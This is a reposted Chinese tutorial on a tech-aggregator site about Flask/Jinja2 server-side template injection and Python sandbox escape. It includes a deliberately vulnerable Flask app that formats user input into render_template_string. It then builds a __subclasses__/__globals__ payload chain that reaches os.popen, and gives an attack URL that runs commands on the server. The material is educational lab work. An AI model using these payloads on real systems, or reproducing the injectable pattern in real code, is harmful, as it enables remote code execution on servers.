IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> SSTI+python沙箱逃逸 -> 正文阅读

[Python知识库]SSTI+python沙箱逃逸

SSTI(Server-Side Template Injection)

服务器接受了用户的输入,过滤不严谨,将用户输入作为web应用模板的一部分,但是在通过模板引擎进行渲染的过程中,执行了用户输入的恶意代码,造成命令执行

沙箱逃逸

在代码执行的环境下,脱离过滤和限制,最终拿到shell权限的过程。

模板引擎

为了使用户界面与业务数据分离而产生,可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档

flask-jinja2

flask使用jinja2作为框架的模板系统。jinja2是基于python的模板引擎,支持Unicode,具有集成的沙箱执行环境。在jinja2中的三种语法

  • 控制结构{% %}
  • 变量取值{{ }}
  • 注释{# #}

例子

name参数可控,并且格式化输出到模板中,再做渲染,通过python2运行

from flask import Flask, templating
from flask import request
from flask import config
from flask import  render_template_string,render_template

app=Flask(__name__)
app.config['SECRET_KEY']="flag{SSTI_123}"#通过http://127.0.0.1:888/123?name={{config}}泄露
@app.route('/123')#设置目录
def app_index():
    template='''{%% block body %%} <div class="center-content error"><h1>hello</h1><h3>%s</h3></div>{%% endblock %%}''' %(request.args.get('name'))#创建模板
    #template.globals['os']=os #在模板环境中注册os模块,才能直接调用eval
    return render_template_string(template)#渲染

if __name__=='__main__':
    app.run(host='0.0.0.0',port=888)#设置ip和端口

由于沙箱原因不能直接eval执行命令,寻找payload攻击链,进入python2

  1. 找到元组的所属类().__class__
  2. 找到基类().__class__.__bases__
  3. 查看子类().__class__.__bases__[0].__subclasses__()
  4. 查看site._Printer子类().__class__.__bases__[0].__subclasses__()[72]
  5. 以字典的形式在site._Printer查找注册的模块().__class__.__bases__[0].__subclasses__()[72].__init__.__globals__
  6. 最后一个存在os模块,可以利用
().__class__.__bases__[0].__subclasses__()[72].__init__.__globals__['os'].popen('whoami').read()

最后通过访问http://127.0.0.1:888/123?name={{().__class__.__bases__[0].__subclasses__()[72].__init__.__globals__['os'].popen('notepad').read()}}执行命令

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2021-10-03 17:02:17  更:2021-10-03 17:04:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 20:28:37-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计